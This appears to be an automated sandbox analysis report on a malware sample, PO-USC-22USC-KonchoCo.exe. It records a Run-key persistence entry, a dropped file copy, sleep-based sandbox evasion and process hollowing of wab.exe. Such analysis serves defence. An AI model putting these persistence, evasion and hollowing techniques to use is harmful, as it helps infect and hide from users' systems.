Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A44075 push es; iretd	1_2_08A4416D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A43D99 push ebp; iretd	1_2_08A43DA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A44327 push ds; iretd	1_2_08A44407
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A44302 push ds; iretd	1_2_08A44407
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A43F57 pushfd ; ret	1_2_08A43F58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A44151 push es; iretd	1_2_08A4416D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_04064411 push ds; iretd	9_2_04064407
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_04062C2F push 00000002h; iretd	9_2_04062C31
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_0406602A push cs; retf	9_2_0406602B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_04064075 push es; iretd	9_2_0406416D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_040624A5 push FFFFFFA0h; ret	9_2_040624A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_04065AC2 push 00000064h; ret	9_2_04065AC5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_040648C8 push ss; iretd	9_2_040648CA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_040642F2 push edx; retf	9_2_040642F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_04064302 push ds; iretd	9_2_04064407
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_04064327 push ds; iretd	9_2_04064407
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_04063F57 pushfd ; ret	9_2_04063F58
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_04064151 push es; iretd	9_2_0406416D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 9_2_04063D99 push ebp; iretd	9_2_04063DA2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Insecta			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Insecta			Jump to behavior

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7068	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2659	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 1980	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7904	Thread sleep time: -5534023222112862s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1668	Thread sleep count: 1980 > 30			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Thread sleep count: Count: 1980 delay: -5

Jump to behavior

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Code function: 0_2_004069DF FindFirstFileW,FindClose,	0_2_004069DF
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Code function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D8E
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\brosy\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\|
Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wab.exe, 00000009.00000002.4113065678.0000000009B14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHT

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	API call chain: ExitProcess graph end node			graph_0-3605
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	API call chain: ExitProcess graph end node			graph_0-3600

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Sample uses process hollowing technique

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
